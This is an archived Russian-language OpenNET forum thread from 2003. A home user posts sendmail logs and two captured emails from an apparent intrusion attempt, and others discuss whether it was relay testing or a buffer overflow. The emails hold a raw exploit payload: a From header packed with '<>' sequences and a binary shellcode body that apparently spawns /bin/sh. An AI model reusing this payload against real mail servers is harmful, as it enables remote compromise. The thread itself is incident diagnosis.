The OpenNET Project / Index page

[ новости /+++ | форум | теги | ]

форумы  помощь  поиск  регистрация  майллист  ВХОД  слежка  RSS
"кажись пробовали ломать..... или уже взломали :)))"
Вариант для распечатки Архивированная нить - только для чтения! 
Пред. тема | След. тема 
Форумы OpenNET: Виртуальная конференция (Public)
Изначальное сообщение [Проследить за развитием треда]

"кажись пробовали ломать..... или уже взломали :)))"
Сообщение от skydion Искать по авторуВ закладки on 07-Мрт-03, 20:37  (MSK)
Вот балуюсь дома debian как всегда нету времени на ее настройку.
Поставил sendmail и ядро 2.4.20 так как там нужно фаерволить через
iptables с которым еще не разобрался то и фаервола у меня нету :)
и вот видимо вчера пробовали ломать этот самый sendmail

Mar  6 19:50:46 safari sm-mta[450]: h26HokXY000450: Milter: no active filter
Mar  6 19:50:46 safari sm-mta[450]: h26HokXY000450: --- 220 myhome.net ESMTP Sendmail 8.12.7/8.12.7; Thu, 6 Mar 2003 19:50:46 +0200
Mar  6 19:50:46 safari sm-mta[450]: h26HokXY000450: <-- helo yahoo.com
Mar  6 19:50:46 safari sm-mta[450]: h26HokXY000450: --- 250 myhome.net Hello localhost [127.0.0.1], pleased to meet you
Mar  6 19:50:46 safari sm-mta[450]: h26HokXY000450: <-- mail from: anonymous@yahoo.com
Mar  6 19:50:46 safari sm-mta[450]: h26HokXY000450: --- 250 2.1.0 anonymous@yahoo.com... Sender ok
Mar  6 19:50:46 safari sm-mta[450]: h26HokXY000450: <-- rcpt to: lp
Mar  6 19:50:46 safari sm-mta[450]: h26HokXY000450: --- 250 2.1.5 lp... Recipient ok
Mar  6 19:50:46 safari sm-mta[450]: h26HokXY000450: <-- data
Mar  6 19:50:46 safari sm-mta[450]: h26HokXY000450: --- 354 Enter mail, end with "." on a line by itself
Mar  6 19:50:46 safari sm-mta[450]: h26HokXY000450: from=anonymous@yahoo.com, size=2379, class=0, nrcpts=1, msgid=<200303061750.h26HokXY000450@myhome.net>, proto=SMTP, daemon=MTA, relay=localhost [127.0.0.1]
Mar  6 19:50:46 safari sm-mta[450]: h26HokXY000450: --- 250 2.0.0 h26HokXY000450 Message accepted for delivery
Mar  6 19:50:46 safari sm-mta[450]: h26HokXZ000450: --- 421 4.4.1 myhome.net Lost input channel from localhost [127.0.0.1]
Mar  6 19:50:46 safari sm-mta[450]: h26HokXZ000450: lost input channel from localhost [127.0.0.1] to MTA after data
Mar  7 19:11:10 safari sm-mta[288]: error: safesasl(/etc/sasldb) failed: No such file or directory
Mar  7 19:11:10 safari sm-mta[291]: starting daemon (8.12.7): SMTP+queueing@00:10:00
Mar  7 19:11:10 safari sm-mta[291]: STARTTLS: ServerCertFile missing
Mar  7 19:11:10 safari sm-mta[291]: started as: /usr/sbin/sendmail -Am -L sm-mta -bd -q10m
Mar  7 19:11:10 safari sm-mta[292]: h26HoKXY000439: alias lp => root
Mar  7 19:11:10 safari sm-mta[292]: h26HoKXY000439: SYSERR(root): Infinite loop in ruleset canonify, rule 16
Mar  7 19:11:10 safari sm-mta[292]: h26HoKXY000439: to=root, delay=23:20:50, xdelay=00:00:00, mailer=local, pri=122378, dsn=2.0.0, stat=Sent
Mar  7 19:11:10 safari sm-mta[292]: h26HoKXY000439: done; delay=23:20:50, ntries=1
Mar  7 19:11:10 safari sm-mta[292]: h26HoLXY000440: alias lp => root
Mar  7 19:11:10 safari sm-mta[292]: h26HoLXY000440: SYSERR(root): Infinite loop in ruleset canonify, rule 16
Mar  7 19:11:10 safari sm-mta[292]: h26HoLXY000440: to=root, delay=23:20:49, xdelay=00:00:00, mailer=local, pri=122378, dsn=2.0.0, stat=Sent
Mar  7 19:11:10 safari sm-mta[292]: h26HoLXY000440: done; delay=23:20:49, ntries=1
Mar  7 19:11:10 safari sm-mta[292]: h26HoMXY000441: alias lp => root
Mar  7 19:11:10 safari sm-mta[292]: h26HoMXY000441: SYSERR(root): Infinite loop in ruleset canonify, rule 16
Mar  7 19:11:10 safari sm-mta[292]: h26HoMXY000441: to=root, delay=23:20:48, xdelay=00:00:00, mailer=local, pri=122378, dsn=2.0.0, stat=Sent
Mar  7 19:11:10 safari sm-mta[292]: h26HoMXY000441: done; delay=23:20:48, ntries=1
Mar  7 19:11:10 safari sm-mta[292]: h26HoNXY000442: alias lp => root
Mar  7 19:11:10 safari sm-mta[292]: h26HoNXY000442: SYSERR(root): Infinite loop in ruleset canonify, rule 16
Mar  7 19:11:10 safari sm-mta[292]: h26HoNXY000442: to=root, delay=23:20:47, xdelay=00:00:00, mailer=local, pri=122378, dsn=2.0.0, stat=Sent
Mar  7 19:11:10 safari sm-mta[292]: h26HoNXY000442: done; delay=23:20:47, ntries=1
Mar  7 19:11:10 safari sm-mta[292]: h26HoNXY000443: alias lp => root
Mar  7 19:11:10 safari sm-mta[292]: h26HoNXY000443: SYSERR(root): Infinite loop in ruleset canonify, rule 16
Mar  7 19:11:10 safari sm-mta[292]: h26HoNXY000443: to=root, delay=23:20:46, xdelay=00:00:00, mailer=local, pri=122378, dsn=2.0.0, stat=Sent

А дальше идет видимо сам эксплоит вот вопрос неможе кто либо сказать мне
был взлом или нет? Собственно мне это не очень и нужно так как система
тестовая но все же интересно разобратся раз уж так случилось :)

From anonymous@yahoo.com  Fri Mar  7 19:11:10 2003
Return-Path: <anonymous@yahoo.com>
Received: from yahoo.com (localhost [127.0.0.1])
by myhome.net (8.12.7/8.12.7) with SMTP id h26HoKXY000439
for lp; Thu, 6 Mar 2003 19:50:20 +0200
Date: Thu, 6 Mar 2003 19:50:20 +0200
Message-Id: <200303061750.h26HoKXY000439@myhome.net>
From: "<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><
Subject: hello
Status: RO
Content-Length: 2047
Lines: 1

øøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøëëèùÿÿÿÍÃ_ÿG1ÀPjjTY°f1ÛCÿ׺ ÿÿþ¹ßÿÿÿ1ÊRºýÿû¨¹ÿÿÿÿ1ÊRT^jVPP^TY°fj[ÿ×V[1ɱ1À°?Iÿ×Aâö1ÀPh//shh/binT[PSTY1Ò° ÿ×øøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøø

From anonymous@yahoo.com  Fri Mar  7 19:11:10 2003
Return-Path: <anonymous@yahoo.com>
Received: from yahoo.com (localhost [127.0.0.1])
by myhome.net (8.12.7/8.12.7) with SMTP id h26HoLXY000440
for lp; Thu, 6 Mar 2003 19:50:21 +0200
Date: Thu, 6 Mar 2003 19:50:21 +0200
Message-Id: <200303061750.h26HoLXY000440@myhome.net>
From: "<><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><><
Subject: hello
Status: RO
Content-Length: 2047
Lines: 1

øøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøëëèùÿÿÿÍÃ_ÿG1ÀPjjTY°f1ÛCÿ׺ ÿÿþ¹ßÿÿÿ1ÊRºýÿû¨¹ÿÿÿÿ1ÊRT^jVPP^TY°fj[ÿ×V[1ɱ1À°?Iÿ×Aâö1ÀPh//shh/binT[PSTY1Ò° ÿ×øøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøøø

  Рекомендовать в FAQ | Cообщить модератору | Наверх

 Оглавление

Индекс форумов | Темы | Пред. тема | След. тема
Сообщения по теме

1. "RE: кажись пробовали ломать..... или уже взломали :)))"
Сообщение от Booter emailИскать по авторуВ закладки on 08-Мрт-03, 04:15  (MSK)
>и вот видимо вчера пробовали ломать этот самый sendmail

Не сколько ломать, сколько тестировать на открытый релей. Через мою почтовку прокачали как-то гигамайт спама, причем загрузка машины была 100%... :) Так что с этим делом поосторожнее можно и в спаммеры попасть и на деньги влететь...

  Рекомендовать в FAQ | Cообщить модератору | Наверх

2. "RE: кажись пробовали ломать..... или уже взломали :)))"
Сообщение от skydion Искать по авторуВ закладки on 08-Мрт-03, 12:17  (MSK)
Да нет не думаю, что это тестирование на релей..... скорее тестирование на последний
буфер-оверфлов в sendmail.

У меня уже было тестирование :) там вася пробовал письма по 20 различным адресам кинуть,
а здесь на lp кидают тоесть я выступаю в роли жертвы, и последние два письма, это из
рутового мейлбокса, там их штук 15 лежит я их еще не удалял.... думаю дизасемблить
начало этого кода, там видно будет...

а если посмотреть на лог подключения к серверу то видно что там есть
Mar  6 19:50:46 safari sm-mta[450]: h26HokXZ000450:
--- 421 4.4.1 myhome.net Lost input channel from localhost [127.0.0.1]
Mar  6 19:50:46 safari sm-mta[450]: h26HokXZ000450: lost input channel from localhost [127.0.0.1] to MTA after data

  Рекомендовать в FAQ | Cообщить модератору | Наверх

3. "RE: кажись пробовали ломать..... или уже взломали :)))"
Сообщение от skydion Искать по авторуВ закладки on 08-Мрт-03, 12:20  (MSK)
Да нет, не думаю, что это тестирование на релей..... скорее тестирование на последний
буфер-оверфлов в sendmail.

У меня уже было тестирование :) там вася пробовал письма по 20-30 различным адресам кинуть, а
здесь на lp кидают тоесть я выступаю в роли жертвы, и последние два письма, это из
рутового мейлбокса, там их штук 15 лежит я их еще не удалял.... думаю дизасемблить
начало этого кода, там видно будет...  а если посмотреть на лог подключения к серверу то видно,
что там есть строки:
Mar  6 19:50:46 safari sm-mta[450]: h26HokXZ000450: --- 421 4.4.1 myhome.net Lost input channel from localhost [127.0.0.1]
Mar  6 19:50:46 safari sm-mta[450]: h26HokXZ000450: lost input channel from localhost [127.0.0.1] to MTA after data

с какой это радости sendmail бросает канал?

  Рекомендовать в FAQ | Cообщить модератору | Наверх

4. "RE: кажись пробовали ломать..... или уже взломали :)))"
Сообщение от Lamer emailИскать по авторуВ закладки on 08-Мрт-03, 19:13  (MSK)
SYSERR(root): Infinite loop in ruleset canonify, rule 16

-пишут "Системная ошибка: Бесконечная петля в наборе правил canonify, набор 16"

Может в конфигурации проблема???

  Рекомендовать в FAQ | Cообщить модератору | Наверх

5. "RE: кажись пробовали ломать..... или уже взломали :)))"
Сообщение от skydion Искать по авторуВ закладки on 08-Мрт-03, 20:56  (MSK)
А фиг его знает :) почта ходит без проблем, а я думаю, что все же это из-за експлоита такая
фича вылезла, я RH протестил этим эксплоитом таже фигня и теже письма в мейлбоксе.
Там на счет знаков <> что-то говорится... кажись они и используются для загона сендмыла
в этот самый цыкл.
  Рекомендовать в FAQ | Cообщить модератору | Наверх


Удалить

Индекс форумов | Темы | Пред. тема | След. тема
Пожалуйста, прежде чем написать сообщение, ознакомьтесь с данными рекомендациями.




Партнёры:
PostgresPro
Inferno Solutions
Hosting by Hoster.ru
Хостинг:

Закладки на сайте
Проследить за страницей
Created 1996-2024 by Maxim Chirkov
Добавить, Поддержать, Вебмастеру